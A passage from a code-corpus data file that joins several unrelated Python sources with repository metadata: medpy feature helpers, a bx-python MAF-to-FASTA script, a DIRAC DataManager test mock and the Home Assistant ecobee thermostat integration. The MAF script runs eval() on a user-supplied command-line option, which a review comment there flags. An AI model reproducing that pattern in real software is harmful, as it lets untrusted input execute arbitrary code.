    return numpy.sqrt(numpy.sum(numpy.square(indices), 0))[mask].ravel()
def __extract_intensities(image, mask = slice(None)):
    """
    Internal, single-image version of @see intensities
    Returns a flattened copy of the intensities selected by the mask.
    """
    # copy first so the caller's image is never aliased by the result
    data = numpy.array(image, copy=True)
    return data[mask].ravel()
def __substract_hemispheres(active, reference, active_sigma, reference_sigma, voxel_spacing):
    """
    Helper function for @see __extract_hemispheric_difference.
    Gaussian-smoothes both inputs (kernel sigmas given in mm, converted to
    voxel units via the voxel spacing) and returns active minus reference.
    """
    smoothed = []
    for img, sigma_mm in ((active, active_sigma), (reference, reference_sigma)):
        kernel = __create_structure_array(sigma_mm, voxel_spacing)
        smoothed.append(gaussian_filter(img, sigma = kernel))
    return smoothed[0] - smoothed[1]
def __create_structure_array(structure_array, voxelspacing):
    """
    Convenient function to take a structure array (single number valid for all dimensions
    or a sequence with a distinct number for each dimension) assumed to be in mm and
    returns a structure array (a sequence) adapted to the image space using the supplied
    voxel spacing.
    """
    # a scalar applies uniformly to every dimension; detect it by
    # (non-)iterability rather than by explicit type checks
    try:
        iter(structure_array)
    except TypeError:
        structure_array = [structure_array] * len(voxelspacing)
    return [s / float(vs) for s, vs in zip(structure_array, voxelspacing)]
def __extract_feature(fun, image, mask = slice(None), **kwargs):
    """
    Convenient function to cope with multi-spectral images and feature normalization.
    @param fun the feature extraction function to call
    @param image the single or multi-spectral image
    @param mask the binary mask to select the voxels for which to extract the feature
    @param kwargs additional keyword arguments to be passed to the feature extraction function
    """
    # normalise any non-slice mask to a boolean numpy array
    # Fixed: the `numpy.bool` alias was removed in NumPy 1.24; builtin bool
    # is the documented replacement.
    if not isinstance(mask, slice):
        mask = numpy.array(mask, copy=False, dtype=bool)
    # multi-spectral image: extract per spectrum and join the feature vectors
    if isinstance(image, (tuple, list)):
        return utilities.join(*[fun(i, mask, **kwargs) for i in image])
    else:
        return fun(image, mask, **kwargs)
|
kleinfeld/medpy
|
medpy/features/intensity.py
|
Python
|
gpl-3.0
| 28,940
|
[
"Gaussian"
] |
6d0076e99c64ba0cac9f42f562ea8cf72292fff3558c603a8b31c838ccd5a84a
|
#!/galaxy/home/mgehrin/hiclib/bin/python
"""
Read a maf and print the text as a fasta file, concatenating blocks. A
specific subset of species can be chosen.
usage %prog [options] species1,species2,... < maf_file > fasta_file
--fill="expression": Insert this between blocks
--wrap=columns: Wrap FASTA to this many columns
"""
from optparse import OptionParser
import textwrap
import sys
from bx.align import maf
def __main__():
    """Read a MAF from stdin and write concatenated per-species texts as FASTA.

    Species come from the positional arguments (comma separated).  Blocks in
    which a species is missing contribute a gap run of the block's text size.
    """
    # Parse command line arguments
    parser = OptionParser()
    parser.add_option( "--fill", action="store", default=None, type="string", help="" )
    parser.add_option( "--wrap", action="store", default=None, type="int", help="" )
    parser.add_option( "--nowrap", action="store_true", default=False, dest="nowrap", help="" )
    ( options, args ) = parser.parse_args()
    species = []
    for arg in args: species.extend( arg.split( ',' ) )
    # SECURITY NOTE(review): eval() of a user-supplied --fill value executes
    # arbitrary code; kept for backward compatibility, but only trusted
    # values should ever be passed here.
    fill = ""
    if options.fill: fill = eval( options.fill )
    # wrapping defaults to 50 columns; --wrap overrides, --nowrap disables
    wrap = 50
    if options.wrap is not None: wrap = options.wrap
    elif options.nowrap: wrap = 0
    # create the concatenated sequences
    texts = {}
    for s in species: texts[s] = []
    maf_reader = maf.Reader( sys.stdin )
    for m in maf_reader:
        for s in species:
            c = m.get_component_by_src_start( s )
            if c: texts[s].append( c.text )
            else: texts[s].append( "-" * m.text_size )
    for s in species:
        # Fixed: `print ">" + s` is a Python-2-only statement; sys.stdout.write
        # produces identical output and is version agnostic.
        sys.stdout.write( ">%s\n" % s )
        print_n( fill.join( texts[s] ), wrap )
def print_n( s, n, f = sys.stdout ):
    """Write string `s` to `f`, wrapped to at most `n` characters per line.

    A non-positive `n` disables wrapping and emits `s` on a single line.
    Fixed: the Python-2-only ``print >> f`` statement is replaced by the
    equivalent ``f.write`` call, which behaves identically on Python 2 and 3.
    """
    if n <= 0:
        f.write( "%s\n" % s )
    else:
        p = 0
        while p < len( s ):
            f.write( "%s\n" % s[p:min(p+n,len(s))] )
            p += n
# Entry point: run the conversion when the module is executed as a script.
if __name__ == "__main__": __main__()
|
bxlab/HiFive_Paper
|
Scripts/HiCLib/bx-python-0.7.1/build/scripts-2.7/maf_to_concat_fasta.py
|
Python
|
bsd-3-clause
| 1,723
|
[
"Galaxy"
] |
47572e0ef1aa0fc96a6975b3cef008556736902044f05c4aecf803965a8b8c34
|
""" A mock of the DataManager, used for testing purposes
"""
# pylint: disable=protected-access, missing-docstring, invalid-name, line-too-long
from mock import MagicMock
from DIRAC import S_OK
# A MagicMock standing in for the DataManager; every configured method
# returns a canned, successful DIRAC-style result structure.
dm_mock = MagicMock()

# All replica-lookup variants alias the very same canned result object.
dm_mock.getReplicas.return_value = S_OK({'Successful': {'/a/lfn/1.txt': {'SE1': '/a/lfn/at/SE1.1.txt',
                                                                         'SE2': '/a/lfn/at/SE2.1.txt'},
                                                        '/a/lfn/2.txt': {'SE1': '/a/lfn/at/SE1.1.txt'}},
                                         'Failed': {}})
dm_mock.getActiveReplicas.return_value = dm_mock.getReplicas.return_value
dm_mock.getReplicasForJobs.return_value = dm_mock.getReplicas.return_value

# Metadata lookup succeeds for a single dummy entry.
dm_mock.getCatalogFileMetadata.return_value = {'OK': True,
                                               'Value': {'Successful': {'pippo': 'metadataPippo'},
                                                         'Failed': None}}

# Mutating operations all report success; each method gets its own fresh
# dict so a test mutating one return value cannot affect another.
for _op in ('removeFile', 'putStorageDirectory', 'addCatalogFile',
            'putAndRegister', 'getFile'):
    getattr(dm_mock, _op).return_value = {'OK': True, 'Value': {'Failed': False}}
|
fstagni/DIRAC
|
DataManagementSystem/Client/test/mock_DM.py
|
Python
|
gpl-3.0
| 1,323
|
[
"DIRAC"
] |
d705479dd5679d53280a06b91dd78a529d0c2a5561b4c8963f78ac54b2bc80b7
|
"""Support for Ecobee Thermostats."""
from __future__ import annotations
import collections
import voluptuous as vol
from homeassistant.components.climate import ClimateEntity
from homeassistant.components.climate.const import (
ATTR_TARGET_TEMP_HIGH,
ATTR_TARGET_TEMP_LOW,
CURRENT_HVAC_COOL,
CURRENT_HVAC_DRY,
CURRENT_HVAC_FAN,
CURRENT_HVAC_HEAT,
CURRENT_HVAC_IDLE,
FAN_AUTO,
FAN_ON,
HVAC_MODE_COOL,
HVAC_MODE_HEAT,
HVAC_MODE_HEAT_COOL,
HVAC_MODE_OFF,
PRESET_AWAY,
PRESET_NONE,
SUPPORT_AUX_HEAT,
SUPPORT_FAN_MODE,
SUPPORT_PRESET_MODE,
SUPPORT_TARGET_HUMIDITY,
SUPPORT_TARGET_TEMPERATURE,
SUPPORT_TARGET_TEMPERATURE_RANGE,
)
from homeassistant.const import (
ATTR_ENTITY_ID,
ATTR_TEMPERATURE,
PRECISION_HALVES,
PRECISION_TENTHS,
STATE_ON,
TEMP_FAHRENHEIT,
)
from homeassistant.helpers import entity_platform
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity import DeviceInfo
from homeassistant.util.temperature import convert
from .const import _LOGGER, DOMAIN, ECOBEE_MODEL_TO_NAME, MANUFACTURER
from .util import ecobee_date, ecobee_time
ATTR_COOL_TEMP = "cool_temp"
ATTR_END_DATE = "end_date"
ATTR_END_TIME = "end_time"
ATTR_FAN_MIN_ON_TIME = "fan_min_on_time"
ATTR_FAN_MODE = "fan_mode"
ATTR_HEAT_TEMP = "heat_temp"
ATTR_RESUME_ALL = "resume_all"
ATTR_START_DATE = "start_date"
ATTR_START_TIME = "start_time"
ATTR_VACATION_NAME = "vacation_name"
ATTR_DST_ENABLED = "dst_enabled"
ATTR_MIC_ENABLED = "mic_enabled"
ATTR_AUTO_AWAY = "auto_away"
ATTR_FOLLOW_ME = "follow_me"
DEFAULT_RESUME_ALL = False
PRESET_TEMPERATURE = "temp"
PRESET_VACATION = "vacation"
PRESET_HOLD_NEXT_TRANSITION = "next_transition"
PRESET_HOLD_INDEFINITE = "indefinite"
AWAY_MODE = "awayMode"
PRESET_HOME = "home"
PRESET_SLEEP = "sleep"
DEFAULT_MIN_HUMIDITY = 15
DEFAULT_MAX_HUMIDITY = 50
HUMIDIFIER_MANUAL_MODE = "manual"
# Order matters, because for reverse mapping we don't want to map HEAT to AUX
ECOBEE_HVAC_TO_HASS = collections.OrderedDict(
[
("heat", HVAC_MODE_HEAT),
("cool", HVAC_MODE_COOL),
("auto", HVAC_MODE_HEAT_COOL),
("off", HVAC_MODE_OFF),
("auxHeatOnly", HVAC_MODE_HEAT),
]
)
ECOBEE_HVAC_ACTION_TO_HASS = {
# Map to None if we do not know how to represent.
"heatPump": CURRENT_HVAC_HEAT,
"heatPump2": CURRENT_HVAC_HEAT,
"heatPump3": CURRENT_HVAC_HEAT,
"compCool1": CURRENT_HVAC_COOL,
"compCool2": CURRENT_HVAC_COOL,
"auxHeat1": CURRENT_HVAC_HEAT,
"auxHeat2": CURRENT_HVAC_HEAT,
"auxHeat3": CURRENT_HVAC_HEAT,
"fan": CURRENT_HVAC_FAN,
"humidifier": None,
"dehumidifier": CURRENT_HVAC_DRY,
"ventilator": CURRENT_HVAC_FAN,
"economizer": CURRENT_HVAC_FAN,
"compHotWater": None,
"auxHotWater": None,
}
PRESET_TO_ECOBEE_HOLD = {
PRESET_HOLD_NEXT_TRANSITION: "nextTransition",
PRESET_HOLD_INDEFINITE: "indefinite",
}
SERVICE_CREATE_VACATION = "create_vacation"
SERVICE_DELETE_VACATION = "delete_vacation"
SERVICE_RESUME_PROGRAM = "resume_program"
SERVICE_SET_FAN_MIN_ON_TIME = "set_fan_min_on_time"
SERVICE_SET_DST_MODE = "set_dst_mode"
SERVICE_SET_MIC_MODE = "set_mic_mode"
SERVICE_SET_OCCUPANCY_MODES = "set_occupancy_modes"
DTGROUP_INCLUSIVE_MSG = (
f"{ATTR_START_DATE}, {ATTR_START_TIME}, {ATTR_END_DATE}, "
f"and {ATTR_END_TIME} must be specified together"
)
CREATE_VACATION_SCHEMA = vol.Schema(
{
vol.Required(ATTR_ENTITY_ID): cv.entity_id,
vol.Required(ATTR_VACATION_NAME): vol.All(cv.string, vol.Length(max=12)),
vol.Required(ATTR_COOL_TEMP): vol.Coerce(float),
vol.Required(ATTR_HEAT_TEMP): vol.Coerce(float),
vol.Inclusive(
ATTR_START_DATE, "dtgroup", msg=DTGROUP_INCLUSIVE_MSG
): ecobee_date,
vol.Inclusive(
ATTR_START_TIME, "dtgroup", msg=DTGROUP_INCLUSIVE_MSG
): ecobee_time,
vol.Inclusive(ATTR_END_DATE, "dtgroup", msg=DTGROUP_INCLUSIVE_MSG): ecobee_date,
vol.Inclusive(ATTR_END_TIME, "dtgroup", msg=DTGROUP_INCLUSIVE_MSG): ecobee_time,
vol.Optional(ATTR_FAN_MODE, default="auto"): vol.Any("auto", "on"),
vol.Optional(ATTR_FAN_MIN_ON_TIME, default=0): vol.All(
int, vol.Range(min=0, max=60)
),
}
)
DELETE_VACATION_SCHEMA = vol.Schema(
{
vol.Required(ATTR_ENTITY_ID): cv.entity_id,
vol.Required(ATTR_VACATION_NAME): vol.All(cv.string, vol.Length(max=12)),
}
)
RESUME_PROGRAM_SCHEMA = vol.Schema(
{
vol.Optional(ATTR_ENTITY_ID): cv.entity_ids,
vol.Optional(ATTR_RESUME_ALL, default=DEFAULT_RESUME_ALL): cv.boolean,
}
)
SET_FAN_MIN_ON_TIME_SCHEMA = vol.Schema(
{
vol.Optional(ATTR_ENTITY_ID): cv.entity_ids,
vol.Required(ATTR_FAN_MIN_ON_TIME): vol.Coerce(int),
}
)
SUPPORT_FLAGS = (
SUPPORT_TARGET_TEMPERATURE
| SUPPORT_PRESET_MODE
| SUPPORT_AUX_HEAT
| SUPPORT_TARGET_TEMPERATURE_RANGE
| SUPPORT_FAN_MODE
)
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up the ecobee thermostat."""
data = hass.data[DOMAIN]
entities = []
for index in range(len(data.ecobee.thermostats)):
thermostat = data.ecobee.get_thermostat(index)
if not thermostat["modelNumber"] in ECOBEE_MODEL_TO_NAME:
_LOGGER.error(
"Model number for ecobee thermostat %s not recognized. "
"Please visit this link to open a new issue: "
"https://github.com/home-assistant/core/issues "
"and include the following information: "
"Unrecognized model number: %s",
thermostat["name"],
thermostat["modelNumber"],
)
entities.append(Thermostat(data, index, thermostat))
async_add_entities(entities, True)
platform = entity_platform.async_get_current_platform()
def create_vacation_service(service):
"""Create a vacation on the target thermostat."""
entity_id = service.data[ATTR_ENTITY_ID]
for thermostat in entities:
if thermostat.entity_id == entity_id:
thermostat.create_vacation(service.data)
thermostat.schedule_update_ha_state(True)
break
def delete_vacation_service(service):
"""Delete a vacation on the target thermostat."""
entity_id = service.data[ATTR_ENTITY_ID]
vacation_name = service.data[ATTR_VACATION_NAME]
for thermostat in entities:
if thermostat.entity_id == entity_id:
thermostat.delete_vacation(vacation_name)
thermostat.schedule_update_ha_state(True)
break
def fan_min_on_time_set_service(service):
"""Set the minimum fan on time on the target thermostats."""
entity_id = service.data.get(ATTR_ENTITY_ID)
fan_min_on_time = service.data[ATTR_FAN_MIN_ON_TIME]
if entity_id:
target_thermostats = [
entity for entity in entities if entity.entity_id in entity_id
]
else:
target_thermostats = entities
for thermostat in target_thermostats:
thermostat.set_fan_min_on_time(str(fan_min_on_time))
thermostat.schedule_update_ha_state(True)
def resume_program_set_service(service):
"""Resume the program on the target thermostats."""
entity_id = service.data.get(ATTR_ENTITY_ID)
resume_all = service.data.get(ATTR_RESUME_ALL)
if entity_id:
target_thermostats = [
entity for entity in entities if entity.entity_id in entity_id
]
else:
target_thermostats = entities
for thermostat in target_thermostats:
thermostat.resume_program(resume_all)
thermostat.schedule_update_ha_state(True)
hass.services.async_register(
DOMAIN,
SERVICE_CREATE_VACATION,
create_vacation_service,
schema=CREATE_VACATION_SCHEMA,
)
hass.services.async_register(
DOMAIN,
SERVICE_DELETE_VACATION,
delete_vacation_service,
schema=DELETE_VACATION_SCHEMA,
)
hass.services.async_register(
DOMAIN,
SERVICE_SET_FAN_MIN_ON_TIME,
fan_min_on_time_set_service,
schema=SET_FAN_MIN_ON_TIME_SCHEMA,
)
hass.services.async_register(
DOMAIN,
SERVICE_RESUME_PROGRAM,
resume_program_set_service,
schema=RESUME_PROGRAM_SCHEMA,
)
platform.async_register_entity_service(
SERVICE_SET_DST_MODE,
{vol.Required(ATTR_DST_ENABLED): cv.boolean},
"set_dst_mode",
)
platform.async_register_entity_service(
SERVICE_SET_MIC_MODE,
{vol.Required(ATTR_MIC_ENABLED): cv.boolean},
"set_mic_mode",
)
platform.async_register_entity_service(
SERVICE_SET_OCCUPANCY_MODES,
{
vol.Optional(ATTR_AUTO_AWAY): cv.boolean,
vol.Optional(ATTR_FOLLOW_ME): cv.boolean,
},
"set_occupancy_modes",
)
class Thermostat(ClimateEntity):
"""A thermostat class for Ecobee."""
def __init__(self, data, thermostat_index, thermostat):
"""Initialize the thermostat."""
self.data = data
self.thermostat_index = thermostat_index
self.thermostat = thermostat
self._name = self.thermostat["name"]
self.vacation = None
self._last_active_hvac_mode = HVAC_MODE_HEAT_COOL
self._operation_list = []
if (
self.thermostat["settings"]["heatStages"]
or self.thermostat["settings"]["hasHeatPump"]
):
self._operation_list.append(HVAC_MODE_HEAT)
if self.thermostat["settings"]["coolStages"]:
self._operation_list.append(HVAC_MODE_COOL)
if len(self._operation_list) == 2:
self._operation_list.insert(0, HVAC_MODE_HEAT_COOL)
self._operation_list.append(HVAC_MODE_OFF)
self._preset_modes = {
comfort["climateRef"]: comfort["name"]
for comfort in self.thermostat["program"]["climates"]
}
self._fan_modes = [FAN_AUTO, FAN_ON]
self.update_without_throttle = False
async def async_update(self):
"""Get the latest state from the thermostat."""
if self.update_without_throttle:
await self.data.update(no_throttle=True)
self.update_without_throttle = False
else:
await self.data.update()
self.thermostat = self.data.ecobee.get_thermostat(self.thermostat_index)
if self.hvac_mode != HVAC_MODE_OFF:
self._last_active_hvac_mode = self.hvac_mode
@property
def available(self):
"""Return if device is available."""
return self.thermostat["runtime"]["connected"]
@property
def supported_features(self):
"""Return the list of supported features."""
if self.has_humidifier_control:
return SUPPORT_FLAGS | SUPPORT_TARGET_HUMIDITY
return SUPPORT_FLAGS
@property
def name(self):
"""Return the name of the Ecobee Thermostat."""
return self.thermostat["name"]
@property
def unique_id(self):
"""Return a unique identifier for this ecobee thermostat."""
return self.thermostat["identifier"]
@property
def device_info(self) -> DeviceInfo:
"""Return device information for this ecobee thermostat."""
model: str | None
try:
model = f"{ECOBEE_MODEL_TO_NAME[self.thermostat['modelNumber']]} Thermostat"
except KeyError:
# Ecobee model is not in our list
model = None
return DeviceInfo(
identifiers={(DOMAIN, self.thermostat["identifier"])},
manufacturer=MANUFACTURER,
model=model,
name=self.name,
)
@property
def temperature_unit(self):
"""Return the unit of measurement."""
return TEMP_FAHRENHEIT
@property
def precision(self) -> float:
"""Return the precision of the system."""
return PRECISION_TENTHS
@property
def current_temperature(self) -> float:
"""Return the current temperature."""
return self.thermostat["runtime"]["actualTemperature"] / 10.0
@property
def target_temperature_low(self) -> float | None:
"""Return the lower bound temperature we try to reach."""
if self.hvac_mode == HVAC_MODE_HEAT_COOL:
return self.thermostat["runtime"]["desiredHeat"] / 10.0
return None
@property
def target_temperature_high(self) -> float | None:
"""Return the upper bound temperature we try to reach."""
if self.hvac_mode == HVAC_MODE_HEAT_COOL:
return self.thermostat["runtime"]["desiredCool"] / 10.0
return None
@property
def target_temperature_step(self) -> float:
"""Set target temperature step to halves."""
return PRECISION_HALVES
@property
def has_humidifier_control(self):
"""Return true if humidifier connected to thermostat and set to manual/on mode."""
return (
self.thermostat["settings"]["hasHumidifier"]
and self.thermostat["settings"]["humidifierMode"] == HUMIDIFIER_MANUAL_MODE
)
@property
def target_humidity(self) -> int | None:
"""Return the desired humidity set point."""
if self.has_humidifier_control:
return self.thermostat["runtime"]["desiredHumidity"]
return None
@property
def min_humidity(self) -> int:
"""Return the minimum humidity."""
return DEFAULT_MIN_HUMIDITY
@property
def max_humidity(self) -> int:
"""Return the maximum humidity."""
return DEFAULT_MAX_HUMIDITY
@property
def target_temperature(self) -> float | None:
"""Return the temperature we try to reach."""
if self.hvac_mode == HVAC_MODE_HEAT_COOL:
return None
if self.hvac_mode == HVAC_MODE_HEAT:
return self.thermostat["runtime"]["desiredHeat"] / 10.0
if self.hvac_mode == HVAC_MODE_COOL:
return self.thermostat["runtime"]["desiredCool"] / 10.0
return None
@property
def fan(self):
"""Return the current fan status."""
if "fan" in self.thermostat["equipmentStatus"]:
return STATE_ON
return HVAC_MODE_OFF
@property
def fan_mode(self):
"""Return the fan setting."""
return self.thermostat["runtime"]["desiredFanMode"]
@property
def fan_modes(self):
"""Return the available fan modes."""
return self._fan_modes
@property
def preset_mode(self):
"""Return current preset mode."""
events = self.thermostat["events"]
for event in events:
if not event["running"]:
continue
if event["type"] == "hold":
if event["holdClimateRef"] in self._preset_modes:
return self._preset_modes[event["holdClimateRef"]]
# Any hold not based on a climate is a temp hold
return PRESET_TEMPERATURE
if event["type"].startswith("auto"):
# All auto modes are treated as holds
return event["type"][4:].lower()
if event["type"] == "vacation":
self.vacation = event["name"]
return PRESET_VACATION
return self._preset_modes[self.thermostat["program"]["currentClimateRef"]]
@property
def hvac_mode(self):
"""Return current operation."""
return ECOBEE_HVAC_TO_HASS[self.thermostat["settings"]["hvacMode"]]
@property
def hvac_modes(self):
"""Return the operation modes list."""
return self._operation_list
@property
def current_humidity(self) -> int | None:
"""Return the current humidity."""
return self.thermostat["runtime"]["actualHumidity"]
@property
def hvac_action(self):
"""Return current HVAC action.
Ecobee returns a CSV string with different equipment that is active.
We are prioritizing any heating/cooling equipment, otherwase look at
drying/fanning. Idle if nothing going on.
We are unable to map all actions to HA equivalents.
"""
if self.thermostat["equipmentStatus"] == "":
return CURRENT_HVAC_IDLE
actions = [
ECOBEE_HVAC_ACTION_TO_HASS[status]
for status in self.thermostat["equipmentStatus"].split(",")
if ECOBEE_HVAC_ACTION_TO_HASS[status] is not None
]
for action in (
CURRENT_HVAC_HEAT,
CURRENT_HVAC_COOL,
CURRENT_HVAC_DRY,
CURRENT_HVAC_FAN,
):
if action in actions:
return action
return CURRENT_HVAC_IDLE
@property
def extra_state_attributes(self):
"""Return device specific state attributes."""
status = self.thermostat["equipmentStatus"]
return {
"fan": self.fan,
"climate_mode": self._preset_modes[
self.thermostat["program"]["currentClimateRef"]
],
"equipment_running": status,
"fan_min_on_time": self.thermostat["settings"]["fanMinOnTime"],
}
@property
def is_aux_heat(self):
"""Return true if aux heater."""
return "auxHeat" in self.thermostat["equipmentStatus"]
async def async_turn_aux_heat_on(self) -> None:
"""Turn auxiliary heater on."""
if not self.is_aux_heat:
_LOGGER.warning("# Changing aux heat is not supported")
async def async_turn_aux_heat_off(self) -> None:
"""Turn auxiliary heater off."""
if self.is_aux_heat:
_LOGGER.warning("# Changing aux heat is not supported")
def set_preset_mode(self, preset_mode):
"""Activate a preset."""
if preset_mode == self.preset_mode:
return
self.update_without_throttle = True
# If we are currently in vacation mode, cancel it.
if self.preset_mode == PRESET_VACATION:
self.data.ecobee.delete_vacation(self.thermostat_index, self.vacation)
if preset_mode == PRESET_AWAY:
self.data.ecobee.set_climate_hold(
self.thermostat_index, "away", "indefinite", self.hold_hours()
)
elif preset_mode == PRESET_TEMPERATURE:
self.set_temp_hold(self.current_temperature)
elif preset_mode in (PRESET_HOLD_NEXT_TRANSITION, PRESET_HOLD_INDEFINITE):
self.data.ecobee.set_climate_hold(
self.thermostat_index,
PRESET_TO_ECOBEE_HOLD[preset_mode],
self.hold_preference(),
self.hold_hours(),
)
elif preset_mode == PRESET_NONE:
self.data.ecobee.resume_program(self.thermostat_index)
elif preset_mode in self.preset_modes:
climate_ref = None
for comfort in self.thermostat["program"]["climates"]:
if comfort["name"] == preset_mode:
climate_ref = comfort["climateRef"]
break
if climate_ref is not None:
self.data.ecobee.set_climate_hold(
self.thermostat_index,
climate_ref,
self.hold_preference(),
self.hold_hours(),
)
else:
_LOGGER.warning("Received unknown preset mode: %s", preset_mode)
else:
self.data.ecobee.set_climate_hold(
self.thermostat_index,
preset_mode,
self.hold_preference(),
self.hold_hours(),
)
@property
def preset_modes(self):
"""Return available preset modes."""
return list(self._preset_modes.values())
def set_auto_temp_hold(self, heat_temp, cool_temp):
"""Set temperature hold in auto mode."""
if cool_temp is not None:
cool_temp_setpoint = cool_temp
else:
cool_temp_setpoint = self.thermostat["runtime"]["desiredCool"] / 10.0
if heat_temp is not None:
heat_temp_setpoint = heat_temp
else:
heat_temp_setpoint = self.thermostat["runtime"]["desiredCool"] / 10.0
self.data.ecobee.set_hold_temp(
self.thermostat_index,
cool_temp_setpoint,
heat_temp_setpoint,
self.hold_preference(),
self.hold_hours(),
)
_LOGGER.debug(
"Setting ecobee hold_temp to: heat=%s, is=%s, cool=%s, is=%s",
heat_temp,
isinstance(heat_temp, (int, float)),
cool_temp,
isinstance(cool_temp, (int, float)),
)
self.update_without_throttle = True
def set_fan_mode(self, fan_mode):
"""Set the fan mode. Valid values are "on" or "auto"."""
if fan_mode.lower() not in (FAN_ON, FAN_AUTO):
error = "Invalid fan_mode value: Valid values are 'on' or 'auto'"
_LOGGER.error(error)
return
self.data.ecobee.set_fan_mode(
self.thermostat_index,
fan_mode,
self.hold_preference(),
holdHours=self.hold_hours(),
)
_LOGGER.info("Setting fan mode to: %s", fan_mode)
def set_temp_hold(self, temp):
"""Set temperature hold in modes other than auto.
Ecobee API: It is good practice to set the heat and cool hold
temperatures to be the same, if the thermostat is in either heat, cool,
auxHeatOnly, or off mode. If the thermostat is in auto mode, an
additional rule is required. The cool hold temperature must be greater
than the heat hold temperature by at least the amount in the
heatCoolMinDelta property.
https://www.ecobee.com/home/developer/api/examples/ex5.shtml
"""
if self.hvac_mode in (HVAC_MODE_HEAT, HVAC_MODE_COOL):
heat_temp = temp
cool_temp = temp
else:
delta = self.thermostat["settings"]["heatCoolMinDelta"] / 10.0
heat_temp = temp - delta
cool_temp = temp + delta
self.set_auto_temp_hold(heat_temp, cool_temp)
def set_temperature(self, **kwargs):
"""Set new target temperature."""
low_temp = kwargs.get(ATTR_TARGET_TEMP_LOW)
high_temp = kwargs.get(ATTR_TARGET_TEMP_HIGH)
temp = kwargs.get(ATTR_TEMPERATURE)
if self.hvac_mode == HVAC_MODE_HEAT_COOL and (
low_temp is not None or high_temp is not None
):
self.set_auto_temp_hold(low_temp, high_temp)
elif temp is not None:
self.set_temp_hold(temp)
else:
_LOGGER.error("Missing valid arguments for set_temperature in %s", kwargs)
def set_humidity(self, humidity):
"""Set the humidity level."""
if humidity not in range(0, 101):
raise ValueError(
f"Invalid set_humidity value (must be in range 0-100): {humidity}"
)
self.data.ecobee.set_humidity(self.thermostat_index, int(humidity))
self.update_without_throttle = True
def set_hvac_mode(self, hvac_mode):
"""Set HVAC mode (auto, auxHeatOnly, cool, heat, off)."""
ecobee_value = next(
(k for k, v in ECOBEE_HVAC_TO_HASS.items() if v == hvac_mode), None
)
if ecobee_value is None:
_LOGGER.error("Invalid mode for set_hvac_mode: %s", hvac_mode)
return
self.data.ecobee.set_hvac_mode(self.thermostat_index, ecobee_value)
self.update_without_throttle = True
def set_fan_min_on_time(self, fan_min_on_time):
"""Set the minimum fan on time."""
self.data.ecobee.set_fan_min_on_time(self.thermostat_index, fan_min_on_time)
self.update_without_throttle = True
def resume_program(self, resume_all):
"""Resume the thermostat schedule program."""
self.data.ecobee.resume_program(
self.thermostat_index, "true" if resume_all else "false"
)
self.update_without_throttle = True
def hold_preference(self):
"""Return user preference setting for hold time."""
# Values returned from thermostat are:
# "useEndTime2hour", "useEndTime4hour"
# "nextPeriod", "askMe"
# "indefinite"
device_preference = self.thermostat["settings"]["holdAction"]
# Currently supported pyecobee holdTypes:
# dateTime, nextTransition, indefinite, holdHours
hold_pref_map = {
"useEndTime2hour": "holdHours",
"useEndTime4hour": "holdHours",
"indefinite": "indefinite",
}
return hold_pref_map.get(device_preference, "nextTransition")
def hold_hours(self):
"""Return user preference setting for hold duration in hours."""
# Values returned from thermostat are:
# "useEndTime2hour", "useEndTime4hour"
# "nextPeriod", "askMe"
# "indefinite"
device_preference = self.thermostat["settings"]["holdAction"]
hold_hours_map = {
"useEndTime2hour": 2,
"useEndTime4hour": 4,
}
return hold_hours_map.get(device_preference)
def create_vacation(self, service_data):
"""Create a vacation with user-specified parameters."""
vacation_name = service_data[ATTR_VACATION_NAME]
cool_temp = convert(
service_data[ATTR_COOL_TEMP],
self.hass.config.units.temperature_unit,
TEMP_FAHRENHEIT,
)
heat_temp = convert(
service_data[ATTR_HEAT_TEMP],
self.hass.config.units.temperature_unit,
TEMP_FAHRENHEIT,
)
start_date = service_data.get(ATTR_START_DATE)
start_time = service_data.get(ATTR_START_TIME)
end_date = service_data.get(ATTR_END_DATE)
end_time = service_data.get(ATTR_END_TIME)
fan_mode = service_data[ATTR_FAN_MODE]
fan_min_on_time = service_data[ATTR_FAN_MIN_ON_TIME]
kwargs = {
key: value
for key, value in {
"start_date": start_date,
"start_time": start_time,
"end_date": end_date,
"end_time": end_time,
"fan_mode": fan_mode,
"fan_min_on_time": fan_min_on_time,
}.items()
if value is not None
}
_LOGGER.debug(
"Creating a vacation on thermostat %s with name %s, cool temp %s, heat temp %s, "
"and the following other parameters: %s",
self.name,
vacation_name,
cool_temp,
heat_temp,
kwargs,
)
self.data.ecobee.create_vacation(
self.thermostat_index, vacation_name, cool_temp, heat_temp, **kwargs
)
def delete_vacation(self, vacation_name):
"""Delete a vacation with the specified name."""
_LOGGER.debug(
"Deleting a vacation on thermostat %s with name %s",
self.name,
vacation_name,
)
self.data.ecobee.delete_vacation(self.thermostat_index, vacation_name)
def turn_on(self):
"""Set the thermostat to the last active HVAC mode."""
_LOGGER.debug(
"Turning on ecobee thermostat %s in %s mode",
self.name,
self._last_active_hvac_mode,
)
self.set_hvac_mode(self._last_active_hvac_mode)
def set_dst_mode(self, dst_enabled):
"""Enable/disable automatic daylight savings time."""
self.data.ecobee.set_dst_mode(self.thermostat_index, dst_enabled)
def set_mic_mode(self, mic_enabled):
"""Enable/disable Alexa mic (only for Ecobee 4)."""
self.data.ecobee.set_mic_mode(self.thermostat_index, mic_enabled)
def set_occupancy_modes(self, auto_away=None, follow_me=None):
"""Enable/disable Smart Home/Away and Follow Me modes."""
self.data.ecobee.set_occupancy_modes(
self.thermostat_index, auto_away, follow_me
)
|
jawilson/home-assistant
|
homeassistant/components/ecobee/climate.py
|
Python
|
apache-2.0
| 28,471
|
[
"VisIt"
] |
85d424a9af6d94c32dea4bd5cea6d5cd224f69e883d1ff0ff75b2de36e3d4c34
|
from optparse import OptionParser, OptionValueError
import tempfile
import os
import subprocess
import optparse
import shutil
import math
def wh_size(option, opt_str, value, parser, *args, **kwargs):
    """optparse callback: parse a "W,H" string into a list [W, H].

    Stores the parsed pair (tile counts) on ``parser.values`` under the
    option's dest.  Raises OptionValueError if the value is not exactly
    two comma-separated integers.
    """
    try:
        # list(...) instead of a bare map(): on Python 3 map() returns an
        # iterator, which would break later indexing (options.dim[0]).
        dims = [int(part) for part in value.split(',')]
    except ValueError:
        raise OptionValueError(
            "You must use a 2-tuple to define width and height (in tiles).")
    # Enforce the documented contract: exactly width and height.
    if len(dims) != 2:
        raise OptionValueError(
            "You must use a 2-tuple to define width and height (in tiles).")
    setattr(parser.values, option.dest, dims)
if __name__ == '__main__':
    parser = OptionParser()
    parser.add_option("-i", dest="input")
    parser.add_option("-o", dest="output")
